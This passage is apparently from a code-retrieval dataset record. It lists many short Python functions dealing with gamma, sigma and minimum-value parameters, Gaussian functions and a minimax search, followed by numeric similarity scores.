np.log(sigma))", "def lgamma(x):\n return 0.0", "def gamma(self, gamma):\n\n self._gamma = gamma", "def _gammaParameter(self, t : float, dtau : float) -> float:\n pass", "def gamma(x):\n return 0.0", "def __init__(self, ksize_low, ksize_high=None): \n self._sigma_low = 0.3*(ksize_low//2 - 1) + 0.8\n \n if ksize_high is None:\n self._sigma_high = np.sqrt(2)*self._sigma_low\n else:\n self._sigma_high = 0.3*(ksize_high//2 - 1) + 0.8", "def __init__(self, sigma=0.0001):\n self.sigma = sigma", "def gamma(flag, S, K, t, r, sigma, q):\n\n b = r-q\n\n return numerical_gamma(flag, S, K, t, r, sigma, b, f)", "def gamma(self):\r\n raise NotImplementedError('not implemented yet, will use spouge approximation')", "def update_low_sigma_clip(self):\n low_sigma = self.low_sigma_clip.text()\n if low_sigma:\n try:\n self._cache[\"input\"][\"low_sigma_clip\"] = float(low_sigma)\n except ValueError:\n pass\n self.reset_input_style_defaults()\n self.fit_continuum(True)\n self.draw_continuum(True)\n return None", "def _set_ks_static(self, ks):\n self.ks = ks\n if np.max(self.ks) > self._kret:\n self._kret = np.max(self.ks)", "def set_epsilon(value):\n global _EPSILON\n _EPSILON = value", "def set_minVal(self, val):\n self.minVal = val", "def userMinimum(self, new_min: float) -> None:\n self._user_minimum = new_min\n self.reset_limits()", "def setSigma(self, sigma):\n assert len(sigma) == self.explorationlayer.paramdim\n # change the parameters of the exploration layer (owner is self.module)\n self.explorationlayer._setParameters(sigma, self.module)", "def set_mutation(self: A, sigma: tp.Optional[tp.Union[float, \"Array\"]] = None, exponent: tp.Optional[float] = None) -> A:\n if sigma is not None:\n # just replace if an actual Parameter is provided as sigma, else update value (parametrized or not)\n if isinstance(sigma, core.Parameter) or isinstance(self.parameters._content[\"sigma\"], core.Constant):\n self.parameters._content[\"sigma\"] = core.as_parameter(sigma)\n else:\n 
self.sigma.value = sigma # type: ignore\n if exponent is not None:\n if self.bound_transform is not None and not isinstance(self.bound_transform, trans.Clipping):\n raise RuntimeError(f\"Cannot set logarithmic transform with bounding transform {self.bound_transform}, \"\n \"only clipping and constraint bounding methods can accept itp.\")\n if exponent <= 1.0:\n raise ValueError(\"Only exponents strictly higher than 1.0 are allowed\")\n if np.min(self._value.ravel()) <= 0:\n raise RuntimeError(\"Cannot convert to logarithmic mode with current non-positive value, please update it firstp.\")\n self.exponent = exponent\n return self", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value", "def __init__(self, sigma, multiplier=1e-1):\r\n super().__init__(multiplier=multiplier)\r\n self.sigma = sigma", "def exponent(self, k_min=5.5):\n\n assert isinstance(k_min, (float, int)) and k_min > 0\n deg = [k for k in self.deg if k > k_min]\n summa = sum(map(lambda x: log(x/k_min), deg))\n n = len(deg)\n gamma = 1 + n/summa\n sigma = sqrt(n+1) / summa\n\n self.gamma = gamma\n self.k_min = k_min\n\n return gamma, sigma", "def get_gamma(self):\n if self.is_recurrent:\n return 1.0\n else:\n return 1 / np.power( 1 + self.asset_process.risk_free_rate, 1 / self.n_periods_per_year )", "def set_gaussian(self, X, sigma=0):\n sigma = float(sigma)\n if sigma < 0:\n raise ValueError('sigma should be positive')\n self.set_euclidian(X)\n d = self.weights\n\n if sigma == 0:\n sigma = (d ** 2).mean()\n\n w = np.exp(- (d ** 2) / (2 * sigma))\n self.weights = w", "def set_Ec_min(self, x):\n x = float(x)\n if self.Ec_min != x:\n self.Ec_min = x\n self.Ec[0] = x", "def _get_gamma(self):\n gamma = None\n if self.is_clayey():\n gamma = 16.8 + 0.15*self._data[SoilProperty.N60]\n else:\n gamma = 16 + 0.1 * self._data[SoilProperty.N60]\n gamma=_clamp(gamma,10,2.8*9.81)#do we need this\n return gamma", "def get_scale_parameter(self):\r\n \r\n if self.scale_parameter == 0.0: \r\n shape_in_gamma_func = float(1+(1/self.shape_parameter))\r\n gamma_func = special.gamma(shape_in_gamma_func)\r\n self.scale_parameter = (self.mean_fire_recurrence/gamma_func)\r\n return self.scale_parameter\r\n else:\r\n return self.scale_parameter", "def _estimate_gamma(self, x, gamma_type='quantile'):\n if gamma_type == \"quantile\":\n gamma = self.chi2dist.ppf(self.beta)\n res = True\n elif gamma_type == \"std\":\n gamma = self.chi2dist.mean() + self.beta * self.chi2dist.std()\n res = True\n else:\n raise ValueError(\n 'gamma_type <{}> not available.'.format(str(gamma_type)))\n self.gamma = gamma\n return res", "def update_r(self):\n self.gamma_r = self.gamma_s - self.gamma_q\n self.Sigma_r = self.Sigma_s - self.Sigma_q", "def gamma(num: float) -> float:\n if num <= 0:\n raise ValueError(\"math domain error\")\n if num > 171.5:\n raise OverflowError(\"math range error\")\n elif num - int(num) not in (0, 0.5):\n raise NotImplementedError(\"num must be an integer or a half-integer\")\n elif num == 0.5:\n return sqrt(pi)\n else:\n return 1.0 if num == 1 else (num - 1) * gamma(num - 1)", "def M_sigma(self):\n\n print(\"\", file=self.logfile)\n print(\"Updating sigma_2\", file=self.logfile)\n self.sigma2 = 1/self.L_h*(np.square(np.linalg.norm(self.w)) + np.trace(self.R))", "def setGamma(self, g):\n return self._set(gamma=g)", "def sigma(self):\n return self.__sigma", "def initializeDistribution(self):\n self.minVal = min(math.exp(self.upperBound),math.exp(self.lowerBound))\n 
self.maxVal = max(math.exp(self.upperBound),math.exp(self.lowerBound))", "def set_min(self, min):\n self.set_val((min, self.val[1]))", "def __init__(self, precision=0, random_generator=random.Random(), minimum_stochastic_distance=0):\n super(StochasticRound, self).__init__(precision=precision)\n self.random_generator = random_generator\n self.minimum_stochastic_distance = minimum_stochastic_distance", "def set_stdeviations(self, sigma):\n stdeviations = np.ones(len(self.phenotypes)) * sigma\n self.data['stdeviations'] = stdeviations\n return self", "def __init__(self, sigma):\n self.sigma = float(sigma)\n super().__init__(domain=functional.domain,\n range=functional.domain, linear=False)\n\n # Setting up parameters\n self.const = 1 / (functional.epsilon * sigma)", "def update_detection_sigma(self):\n try:\n value = float(self.edit_detection_sigma.text())\n except:\n value = None\n self._get_selected_model().metadata[\"detection_sigma\"] = value\n return None", "def gamma(self) -> float:\n return self._gamma", "def gamma(self):\n if self._gamma is None:\n df = self.kdf\n gamma_ = -self._powerlaw(df.index, df.freq)\n self._gamma = gamma_\n\n # return\n return self._gamma", "def fitGammaFun(self, x, y):\n minGamma = 0.8\n maxGamma = 20.0\n gammaGuess = 2.0\n y = numpy.asarray(y)\n minLum = y[0]\n maxLum = y[-1]\n if self.eq == 4:\n aGuess = old_div(minLum, 5.0)\n kGuess = (maxLum - aGuess)**(old_div(1.0, gammaGuess)) - aGuess\n guess = [gammaGuess, aGuess, kGuess]\n bounds = [[0.8, 5.0], [0.00001, minLum - 0.00001], [2, 200]]\n else:\n guess = [gammaGuess]\n bounds = [[0.8, 5.0]]\n # gamma = optim.fmin(self.fitGammaErrFun, guess, (x, y, minLum, maxLum))\n # gamma = optim.fminbound(self.fitGammaErrFun,\n # minGamma, maxGamma,\n # args=(x,y, minLum, maxLum))\n params = optim.fmin_tnc(self.fitGammaErrFun, numpy.array(guess),\n approx_grad=True,\n args=(x, y, minLum, maxLum),\n bounds=bounds, messages=0)\n return minLum, maxLum, params", "def gamma(self) -> int:\n return self.params.gamma", "def set_priors(self,alpha):\n\n\t\tassert type(alpha) == float\n\t\tself.alpha = alpha", "def get_scale_parameter(self):\n\n if self.scale_parameter == 0.0:\n shape_in_gamma_func = float(1+(1/self.shape_parameter))\n gamma_func = special.gamma(shape_in_gamma_func)\n self.scale_parameter = (self.mean_fire_recurrence/gamma_func)\n return self.scale_parameter\n else:\n return self.scale_parameter", "def __init__(self, mu=1.0, sigma=1.0):\n self.mu = float(mu)\n self.sigma = float(sigma)", "def _sigma_1(gam, eps):\n s1 = 4 * r0**2 * alpha / eps / mec2_unit\n s2 = 1 + (1./3. 
- eps/gam) * (1 - eps/gam)\n s3 = np.log(2 * gam * (gam - eps) / eps) - 1./2.\n s3[np.where(gam < eps)] = 0.0\n return s1 * s2 * s3", "def gamma_natural(A):\n return 2.6544188e-12*A", "def __init__(self):\n BuiltinFunction.__init__(self, \"gamma\", nargs=2, latex_name=r\"\\Gamma\",\n conversions={'maxima':'gamma_incomplete', 'mathematica':'Gamma',\n 'maple':'GAMMA', 'sympy':'uppergamma'})", "def gauss(x, gamma):\n return 1 / np.sqrt(2*np.pi) / gamma * np.exp(-(x/gamma)**2 / 2)", "def _gamma(self, nOrT : float) -> vector:\n pass", "def __init__(self, mu=None, sigma=1.):\n self.mu = mu\n self.sigmasqr = sigma**2", "def get_scale_parameter(self):\n\n shape_in_gamma_func = float(1 + (1 / self._shape_parameter))\n gamma_func = special.gamma(shape_in_gamma_func)\n self._scale_parameter = self._mean_fire_recurrence / gamma_func", "def gauss(x, x0, gamma):\n sigma = gamma / sqrt(2.0)\n \n A = 1/ (sigma * sqrt(2*pi))\n return (A * exp (-0.5 * (x-x0)**2/sigma**2))", "def gamma(x):\r\n gammax = ((x + 0.055) / 1.055) ** 2.4 if x > 0.04045 else x / 12.92\r\n return gammax", "def smale_gamma(f, x0, df, args=()):\n _args = (x0,) + args\n gammas = numpy.zeros(len(df)-1, dtype=numpy.double)\n\n scale = 1. / df[0](*_args)\n for k in range(1, len(df)):\n scale /= (k + 1.) # efficiently compute 1/(dfx0 * k!)\n gammas[k-1] = numpy.abs(scale * df[k](*_args))**(1./k)\n\n gamma = gammas.max()\n return gamma", "def calculate_gamma(self):\n result = self.result\n # scaler = preprocessing.StandardScaler()\n # train_minmax = scaler.fit_transform(result)\n # st_rho, st_delta = train_minmax[:, 0], train_minmax[:, 1]\n # self.gamma = (st_delta + st_rho) / 2\n self.gamma = result[:, 0] * result[:, 1]\n self.gamma_des_index = np.argsort(-self.gamma)", "def gaussed_value(self):\n from random import gauss\n return sorted([0, int(gauss(self.value, self.sigma)), \\\n (self.size*8)-1])[1]", "def vary(num, sigma):\n\tvalue = random.gauss(num, sigma)\n\treturn min(255, max(0, value))", "def set_normal_free_energy(self):\n\t\t\n\t\tself.eps_base = self.mu_eps + self.normal_eps_tuning_prefactor* \\\n\t\t\t\t\t\tsp.exp(-(1.*sp.arange(self.Mm))**2.0/(2.0* \\\n\t\t\t\t\t\tself.normal_eps_tuning_width)**2.0)\n\t\t\t\t\t\t\n\t\tself.eps_base += random_matrix(self.Mm, params=[0, self.sigma_eps], \n\t\t\t\t\t\t\t\t\t\tseed=self.seed_eps)\n\t\t\n\t\t# If dual signal, use the average of the FULL signal nonzero components\n\t\tif self.Kk_split == 0:\n\t\t\tself.eps = self.WL_scaling*sp.log(self.mu_Ss0) + self.eps_base \n\t\telse:\n\t\t\tself.eps = self.WL_scaling*sp.log(sp.average(self.Ss\\\n\t\t\t\t\t\t\t[self.Ss != 0])) + self.eps_base\n\t\t\n\t\t# Apply max epsilon value to each component\n\t\tfor iM in range(self.Mm):\n\t\t\tif self.eps[iM] > self.max_eps:\n\t\t\t\tself.eps[iM] = self.max_eps\n\t\t\tif self.eps[iM] < self.min_eps:\n\t\t\t\tself.eps[iM] = self.min_eps", "def normalize_tree(tree, sigma):\r\n if len(tree) == 3:\r\n normalize_tree(tree[1], sigma)\r\n normalize_tree(tree[2], sigma)\r\n else:\r\n tree[0] = sigma / sqrt(tree[0].real)\r\n tree[1] = 0", "def const_sigma(self):\n if self.sigma is None:\n return (1 - 2 / self.eta) * np.eye(self.ndim)\n else:\n return np.array(self.sigma)", "def _a(self, gamma):\n\n a = np.sqrt(2 * self.kb * self.T * gamma)\n\n return a", "def gamma_star(self):\n return self.reciprocal_lattice_parameters[5]", "def set_default_gpa(cls, default_gpa):\n if cls.MIN_GPA <= default_gpa <= cls.MAX_GPA:\n cls.default_gpa = default_gpa\n else:\n raise ValueError", "def min_ems(self, value) -> 'Size':\n 
raise_not_number(value)\n self.minimum = '{}em'.format(value)\n return self", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def set_xmin(self, xmin):\n self.__xmin = xmin", "def adjust_gamma(self, gamma=0.2) -> tf.Tensor:\n return tf.image.adjust_gamma(self.__frame, gamma=gamma)", "def min_value(self, state, min_alpha, min_beta, min_depth):\r\n if state.terminal_test():\r\n return state.utility(0)\r\n if min_depth <=0 :\r\n return self.score(state)\r\n\r\n v = float(\"inf\")\r\n for a in state.actions():\r\n v = min(v, self.max_value(state.result(a), min_alpha, min_beta, min_depth - 1))\r\n if v <= min_alpha:\r\n return v\r\n min_beta = min(min_beta, v)\r\n return v", "def setValues(\n self,\n distributionType: SymbolicConstant = UNIFORM,\n sigma11: float = None,\n sigma22: float = None,\n sigma33: float = None,\n sigma12: float = None,\n sigma13: float = None,\n sigma23: float = None,\n ):\n pass", "def updateMeanAndVar(X, log_gamma, varianceFloor=5.0):", "def zeroLJForce(sigma):\n return 2**(1/6) * sigma", "def _estimate_gamma(self, x, gamma_type='quantile', **kwargs):\n if gamma_type == \"data\":\n return super()._estimate_gamma(x, gamma_type='quantile')\n\n res = True\n if gamma_type == \"quantile\":\n gamma = self._chi2dist.ppf(self.beta)\n elif gamma_type == \"std\":\n gamma = self._chi2dist.mean() + self.beta * self._chi2dist.std()\n else:\n res = False\n raise ValueError(\n 'gamma_type <{}> not available.'.format(str(gamma_type)))\n self.gamma = gamma\n return res", "def test_min_root_gb_filter(self):\n filters = dict(min_root_gb=80)\n expected = [\n 'cg1.2xlarge',\n 'cg1.4xlarge',\n 'cg1.large',\n 'cg1.xlarge',\n 'm1.large',\n 'm1.xlarge',\n 'sh1.16xlarge',\n 'sh1.2xlarge',\n 'sh1.32xlarge',\n 'sh1.4xlarge',\n 'sh1.8xlarge',\n 'sh1.large',\n 'sh1.xlarge',\n 'tp64.8x8']\n self.assertFilterResults(filters, expected)", "def __init__(self):\n BuiltinFunction.__init__(self, \"gamma_inc_lower\", nargs=2, latex_name=r\"\\gamma\",\n conversions={'maxima':'gamma_greek', 'mathematica':'Gamma',\n 'maple':'GAMMA', 'sympy':'lowergamma'})", "def test_approximate_gamma(self, k):\n mean_column = prior.PriorParams.field_index(\"mean\")\n var_column = prior.PriorParams.field_index(\"var\")\n x = self.priors[self.n][k][mean_column]\n xvar = self.priors[self.n][k][var_column]\n # match mean/variance\n alpha_0, beta_0 = approximate_gamma_mom(x, xvar)\n ck_x = alpha_0 / beta_0\n ck_xvar = alpha_0 / beta_0**2\n assert np.isclose(x, ck_x)\n assert np.isclose(xvar, ck_xvar)\n # match approximate sufficient statistics\n logx, _, _ = approx.approximate_log_moments(x, xvar)\n alpha_1, beta_1 = approx.approximate_gamma_kl(x, logx)\n ck_x = alpha_1 / beta_1\n ck_logx = hypergeo._digamma(alpha_1) - np.log(beta_1)\n assert np.isclose(x, ck_x)\n assert np.isclose(logx, ck_logx)\n # compare KL divergence between strategies\n kl_0 = kl_divergence(\n lambda x: conditional_coalescent_pdf(x, self.n, k),\n lambda x: scipy.stats.gamma.logpdf(x, alpha_0, scale=1 / beta_0),\n )\n kl_1 = kl_divergence(\n lambda x: conditional_coalescent_pdf(x, self.n, k),\n lambda x: scipy.stats.gamma.logpdf(x, alpha_1, scale=1 / beta_1),\n )\n assert kl_1 < kl_0", "def maximize_one(self, gamma, xisum, c, x_digits):\n log_likelihood = np.log(c).sum()\n self._i 
= gamma[0] / gamma[0].sum()\n self._t = (xisum.T / xisum.sum(1)).T\n self._e = np.dot(x_digits, gamma) / gamma.sum(0)\n return log_likelihood", "def min_value(self, min_value):\n\n self._min_value = min_value", "def min_value(self, min_value):\n\n self._min_value = min_value", "def min_value(self, min_value):\n\n self._min_value = min_value", "def optimalGaussian(mu, sigma):\r\n \r\n optimal = gaussian(mu, sigma, mu-3.5*sigma, mu+3.5*sigma) #Calculate values of optimal gaussian\r\n def simulationTestGaussian2(params):\r\n \"\"\"\r\n Compare a gaussian with optimal gaussian\r\n \"\"\"\r\n x = gaussian(params[0], params[1], mu-3.5*sigma, mu+3.5*sigma)\r\n error = np.sum(np.power(optimal - x, 2))/optimal.shape[0]\r\n return 1/error\r\n return simulationTestGaussian2", "def _handleInput(self, paramInput):\n super()._handleInput(paramInput)\n lowFind = paramInput.findFirst('low')\n if lowFind != None:\n self.low = lowFind.value\n alphaFind = paramInput.findFirst('alpha')\n if alphaFind != None:\n self.alpha = alphaFind.value\n else:\n self.raiseAnError(IOError,'alpha value needed for Gamma distribution')\n betaFind = paramInput.findFirst('beta')\n if betaFind != None:\n self.beta = betaFind.value\n # check if lower bound are set, otherwise default\n if not self.lowerBoundUsed:\n self.lowerBoundUsed = True\n self.lowerBound = self.low\n self.initializeDistribution() #TODO this exists in a couple classes; does it really need to be here and not in Simulation? - No. - Andrea", "def gaussian(\n x: float,\n measurement: 'mstats.ValueUncertainty',\n max_sigma: float = 10.0\n) -> float:\n center = measurement.value\n width = measurement.uncertainty\n width = max(width, 1e-6)\n\n if x <= (center - max_sigma * width) or x >= (center + max_sigma * width):\n # Don't calculate values outside a \"reasonable\" 10 sigma range\n return 0.0\n\n coefficient = 1 / math.sqrt(2.0 * math.pi * width * width)\n exponent = -0.5 * ((float(x) - center) ** 2) / (width * width)\n\n return coefficient * math.exp(exponent)", "def sigma(self, sigma_input):\n sigma_out = make_sigma.sigma_gen(self._parent.settings, sigma_input)\n # Assign to parent ICobj:\n self._parent.sigma = sigma_out\n print 'Sigma stored in <IC instance>.sigma'", "def __init__(self, \n param_epsilon, \n param_tau,\n param_u, \n param_gamma_left,\n param_gamma_right,\n param_beta):\n self.epsilon = param_epsilon\n self.tau = param_tau\n self.u = param_u\n self.gamma_left = param_gamma_left\n self.gamma_right = param_gamma_right\n \n self.sigma_retarded = 1j * (self.gamma_left + self.gamma_right) / 2.0\n self.sigma_advanced = - self.sigma_retarded;\n \n self.dim = len(self.u)\n self.rho = np.zeros((2**self.dim))\n \n self.beta = param_beta\n \n self.cutoff_chance = 0.0001\n self.external_distribution = False\n self.external_distribution_array = self.distribution()\n self.external_distribution = True", "def _min_value(\r\n self,\r\n state: TwoPlayerGameState,\r\n alpha: float,\r\n beta: float,\r\n depth: int,\r\n ) -> float:\r\n if state.end_of_game or depth == 0:\r\n phi = self.heuristic.evaluate(state)\r\n else:\r\n phi = np.inf\r\n\r\n successors = self.generate_successors(state)\r\n for successor in successors:\r\n if self.verbose > 1:\r\n print('{}: {}'.format(state.board, phi))\r\n\r\n successor_alpha = self._max_value(\r\n successor, alpha, beta, depth - 1\r\n )\r\n\r\n # Minimizing the max value\r\n if (successor_alpha < phi):\r\n phi = successor_alpha\r\n\r\n # Pruning\r\n if phi <= alpha:\r\n return phi\r\n\r\n beta = min(beta, phi)\r\n\r\n if 
self.verbose > 1:\r\n print('{}: {}'.format(state.board, beta))\r\n\r\n return phi", "def _change_spacing(self, **kwargs):\n start_point = kwargs.get(\"start_point\")\n end_point = kwargs.get(\"end_point\")\n self.t[start_point:end_point] *= kwargs.get(\"gamma\")\n self._base(**kwargs)", "def _onSetParameterLower(self, value):\n self._parameters['lower'] = min(value, self._parameters['upper']) # Limit at upper\n self._logger.info(\"Parameter 'lower' of function '{}' changed to {}\".format(self._function, value))\n self.functionChanged.emit(self._dim, self._function, self._parameters.copy())", "def update_high_sigma_clip(self):\n high_sigma = self.high_sigma_clip.text()\n if high_sigma:\n try:\n self._cache[\"input\"][\"high_sigma_clip\"] = float(high_sigma)\n except ValueError:\n pass\n self.reset_input_style_defaults()\n self.fit_continuum(True)\n self.draw_continuum(True)\n return None", "def _set_minimum_value(self, value):\n # Check if the current value is not None, and if so, throw an error\n # because this property should not be set twice\n if self._get_minimum_value() is not None:\n raise RuntimeError('maximum value should not be set twice')\n\n # If the value is None, ignore it\n if value is None:\n return\n\n # Set the value\n self._minimum_value = value", "def fit_gamma_lsq(t, s, beta, u0, bounds=(0, np.inf), fix_s0=False):\n s = s.A.flatten() if issparse(s) else s\n\n tau = t - np.min(t)\n s0 = np.mean(s[tau == 0])\n g0 = beta * u0 / s0\n\n if fix_s0:\n f_lsq = lambda g: sol_s(tau, s0, u0, 0, beta, g) - s\n ret = least_squares(f_lsq, g0, bounds=bounds)\n gamma = ret.x\n else:\n if np.isfinite(g0):\n f_lsq = lambda p: sol_s(tau, p[1], u0, 0, beta, p[0]) - s\n ret = least_squares(f_lsq, np.array([g0, s0]), bounds=bounds)\n gamma = ret.x[0]\n s0 = ret.x[1]\n else:\n gamma, s0 = np.nan, 0\n return gamma, s0", "def _eta_sfr_scaling(self,x,q):\n i = self.enum[q]\n A = self.scaling_params['A'][i]\n b = self.scaling_params['b'][i]\n return A*x**b", "def gaussian_prior(self):\n self.prior = sps.multivariate_normal(self.m0,self.S0)", "def getGamma(self):\n\t\treturn self.relativistic_gamma" ]
[ "0.6821172", "0.6443684", "0.64384013", "0.6321744", "0.6190171", "0.5993369", "0.59834427", "0.5934069", "0.5904044", "0.5883485", "0.5871269", "0.5817794", "0.58008724", "0.57933", "0.5751669", "0.569705", "0.5695616", "0.56666064", "0.5641036", "0.5599601", "0.5595213", "0.5593684", "0.5573322", "0.5573322", "0.55656", "0.5554882", "0.5554297", "0.5523239", "0.5521399", "0.55123705", "0.546586", "0.5441435", "0.542842", "0.54248327", "0.5424227", "0.54079217", "0.5395123", "0.53824073", "0.53783303", "0.53447515", "0.53200406", "0.531505", "0.531109", "0.530326", "0.5299115", "0.5284732", "0.52827376", "0.5277398", "0.527482", "0.5271354", "0.525188", "0.52485114", "0.52382666", "0.52253824", "0.52030253", "0.51760715", "0.51715195", "0.5170219", "0.51693594", "0.5163245", "0.5148406", "0.5142734", "0.5141318", "0.5136793", "0.5130625", "0.51302505", "0.5126546", "0.5115221", "0.51080316", "0.5105443", "0.5100996", "0.5100996", "0.5083416", "0.5078261", "0.5076869", "0.50753427", "0.50735015", "0.50707793", "0.5055821", "0.5047582", "0.50425833", "0.503823", "0.50289977", "0.5028362", "0.5028362", "0.5028362", "0.5025642", "0.5023279", "0.50224996", "0.5022252", "0.5019545", "0.5019268", "0.5015629", "0.5013415", "0.5004213", "0.49966902", "0.49940512", "0.4993174", "0.49904773", "0.49903145" ]
0.53603756
39
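The set_sigma_threshold record above simply guards against negative values and forwards the threshold to the C library. A minimal usage sketch follows, assuming the surrounding class is the LibXC Python wrapper (pylibxc.LibXCFunctional); the functional name, threshold value, and grid values are illustrative assumptions, not part of the record:

# Hedged sketch: assumes pylibxc (the LibXC Python bindings) and numpy are installed,
# and that the record's method belongs to pylibxc.LibXCFunctional.
import numpy as np
import pylibxc

func = pylibxc.LibXCFunctional("gga_x_pbe", "unpolarized")

try:
    func.set_sigma_threshold(-1.0)       # rejected by the guard shown in the record
except ValueError as exc:
    print(exc)                           # "The sigma threshold cannot be smaller than 0."

func.set_sigma_threshold(1.0e-20)        # accepted; applied in later evaluations
out = func.compute({"rho": np.array([0.1, 0.2]),
                    "sigma": np.array([1.0e-30, 1.0e-30])})
print(out["zk"], out["vrho"])            # energy density and its density derivative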
Sets the smallest value allowed for tau. Smaller values than this get overwritten in the evaluation.
def set_tau_threshold(self, tau_threshold):
    if tau_threshold < 0:
        raise ValueError("The tau threshold cannot be smaller than 0.")

    core.xc_func_set_tau_threshold(self.xc_func, ctypes.c_double(tau_threshold))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self,tau = 1e-3):\n self._tau = tau \n pass", "def __init__(self, tau=1, eps=None):\n self.tau = tau\n self.eps = eps or np.finfo(config.precision).eps\n self.rng = np.random.default_rng()\n self.smax = Softmax()", "def init_tau(self, type: str = 'safest', weight: float = 1.5):\n\n P = self.toeplitz_op.P\n weighted_gram = 2 * self.linear_op.gram\n if self.beta is not None:\n beta = self.beta\n else:\n try:\n beta = eigs(weighted_gram, k=1, which='LM', return_eigenvectors=False, tol=self.eig_tol)\n beta *= (1 + self.eig_tol)\n except Exception('Eigs solver did not converge, trying again with small tolerance...'):\n beta = eigs(weighted_gram, k=1, which='LM', return_eigenvectors=False, tol=1e-3)\n beta *= (1 + 1e-3)\n ub = 1 / beta * (1 + 1 / np.sqrt(P + 1))\n lb = 1 / beta * (1 - 1 / np.sqrt(P + 1))\n if type == 'fastest':\n try:\n alpha = eigs(weighted_gram, k=1, which='SM', return_eigenvectors=False, tol=self.eig_tol)\n alpha *= (1 + self.eig_tol)\n except Exception('Eigs solver did not converge. Alpha is set to zero.'):\n alpha = 0\n tau_opt = 2 / (beta + alpha)\n if (tau_opt <= ub) & (tau_opt >= lb):\n self.tau = tau_opt\n else:\n min_lb = np.fmin(np.abs(1 - lb * alpha), np.abs(1 - lb * beta))\n min_ub = np.fmin(np.abs(1 - ub * alpha), np.abs(1 - ub * beta))\n if np.argmin([min_lb, min_ub]) == 0:\n self.tau = lb\n else:\n self.tau = ub\n elif type == 'safest':\n self.tau = 1 / beta\n elif type == 'largest':\n self.tau = ub\n else:\n self.tau = weight / beta", "def tau_V(self, value):\n if not (self.tau_V_range[0] <= value <= self.tau_V_range[1]):\n raise InputParameterError(\n \"parameter tau_V must be between \"\n + str(self.tau_V_range[0])\n + \" and \"\n + str(self.tau_V_range[1])\n )", "def changetau(self, tau):\n if tau == self.tau:\n return self\n elif tau < self.tau:\n return AsymptoticTimeInvariant(self.v[self.tau - tau: tau + self.tau - 1])\n else:\n v = np.zeros(2*tau-1)\n v[tau - self.tau: tau + self.tau - 1] = self.v\n return AsymptoticTimeInvariant(v)", "def getTau(self) -> float:\n return self.tau", "def set_minVal(self, val):\n self.minVal = val", "def set_min(self, min):\n self.set_val((min, self.val[1]))", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def __init__(self, tau=1, dim=None, inplace=False):\n super(GumbelSoftmax, self).__init__()\n self.tau = tau\n self.dim = dim\n self.inplace = inplace", "def set_Ec_min(self, x):\n x = float(x)\n if self.Ec_min != x:\n self.Ec_min = x\n self.Ec[0] = x", "def set_tr(self, x):\n x = float(x)\n if self.tr != x:\n self.tr = x", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value", "def setMinValue(self, min_value):\r\n\t\tself.MinValue = min_value", "def _set_bet_limit(self) -> None:\n for i, ratio in enumerate(BET_LIMIT_RATIOS):\n self._bet_limits[i] = self._treasury_min.get() // ratio", "def min_temp(self):\n return 1", "def min_value(self) -> float:\n return DEFAULT_MIN_VALUE", "def __init__(self, value):\n self.value = max(min(value,1.0),-1.0)", "def __init__(self, value):\n self.value = max(min(value,1.0),-1.0)", "def reset(self):\n self.value = self.min_value", "def initial_value(self) -> float:\n return self._initial_value", "def tau_turnover(self):\n return self.tau_batch/self.N_trains", "def 
set_locked_temp_min(self, value: int = 0):\r\n if self._temperature_scale == \"F\":\r\n self._locked_temp_min = celsius_to_kelvin(\r\n fahrenheit_to_celsius(value)\r\n )\r\n elif self._temperature_scale == \"C\":\r\n self._locked_temp_min = celsius_to_kelvin(value)\r\n else:\r\n self._locked_temp_min = value\r\n\r\n self._logger.info(log_message_formatter(\r\n \"set\", f\"{self}\", \"locked_temp_min\", value))", "def set_tin(self, tin):\n self.tin = tin[:]", "def inc_tau_trans(self):\r\n self.num_tau_trans += 1", "def test_set_pT(self):\n s = State(substance=\"water\")\n s.pT = Q_(101325.0, \"Pa\"), Q_(400.0, \"K\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.pT[1], Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.pT[0], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.u, Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(7496.2021523754065, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cp, Q_(2009.2902478486988, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cv, Q_(1509.1482452129906, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(1.801983936953226, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(2730301.3859201893, \"J/kg\")) # type: ignore\n assert s.x is None\n assert s.phase == \"gas\"", "def userMinimum(self, new_min: float) -> None:\n self._user_minimum = new_min\n self.reset_limits()", "def set_t_FAST(self):\n\t\n\tself.N = 2**7\n\tdt = self.Orbit.Tobs/self.N\n\tself.t = np.linspace(0, self.N-1, self.N)*self.Orbit.Tobs/self.N\n\t\n\treturn", "def native_min_value(self) -> float:\n return TEMP_MINIMUM", "def test_set_uT(self):\n s = State(substance=\"water\")\n s.uT = Q_(2547715.3635084038, \"J/kg\"), Q_(400.0, \"K\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.uT[1], Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.uT[0], Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.u, Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(7496.2021523754065, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cp, Q_(2009.2902478486988, \"J/(kg*K)\")) # type: ignore\n assert 